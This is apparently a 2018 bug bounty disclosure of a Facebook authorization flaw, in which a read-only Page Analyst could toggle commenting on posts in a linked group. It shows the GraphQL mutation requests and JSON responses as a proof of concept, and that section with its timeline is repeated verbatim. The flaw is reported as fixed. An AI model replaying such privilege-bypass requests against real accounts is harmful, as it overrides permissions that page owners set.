Page admins can link group on their page. In which Page admin gets Admin privilege, editor and moderator gets moderator privilege. And two other roles(Advertiser and Analyst) are read-only. But they were not validated properly. Having analyst role on a page it was possible to turn on/off commenting of a post in the linked group.
The graphql request while turning off comment of a post was:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1543355012409944&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_disable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": false,
"have_comments_been_disabled": true,
"comments_disabled_notice": {
"text": "You turned off commenting for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
Turning on comment of a post:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1654699771253093&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_enable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": true,
"have_comments_been_disabled": false,
"comments_disabled_notice": {
"text": "Commenting has been turned off for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
Video PoC:
Timeline:
Thursday, March 22, 2018 at 8:00pm: Report Sent
Friday, April 20, 2018 at 11:11am: Facebook responded by saying they internally found the issue and fixed the issue.
Wednesday, May 23, 2018 at 12:47am:$500 Bounty
The graphql request while turning off comment of a post was:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1543355012409944&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_disable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": false,
"have_comments_been_disabled": true,
"comments_disabled_notice": {
"text": "You turned off commenting for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
Turning on comment of a post:
https://graph.facebook.com/v2.12/graphql?variables={"0":{"client_mutation_id":"","PAGE ID":"","feedback_id":"<base64 encoded post ID>"}}&doc_id=1654699771253093&access_token=<PAGE ACCESS TOKEN>
Response:
{
"data": {
"feedback_enable_commenting": {
"feedback": {
"id": "ZmVlZGJhY2s6OTQ3NzA0ODEyMDY2MjUz",
"legacy_api_post_id": "821695251333877_947704812066253",
"can_viewer_comment": true,
"have_comments_been_disabled": false,
"comments_disabled_notice": {
"text": "Commenting has been turned off for this post.",
"ranges": [],
"delight_ranges": []
}
}
}
}
}
Video PoC:
Timeline:
Thursday, March 22, 2018 at 8:00pm: Report Sent
Friday, April 20, 2018 at 11:11am: Facebook responded by saying they internally found the issue and fixed the issue.
Wednesday, May 23, 2018 at 12:47am:$500 Bounty
Comments
Post a Comment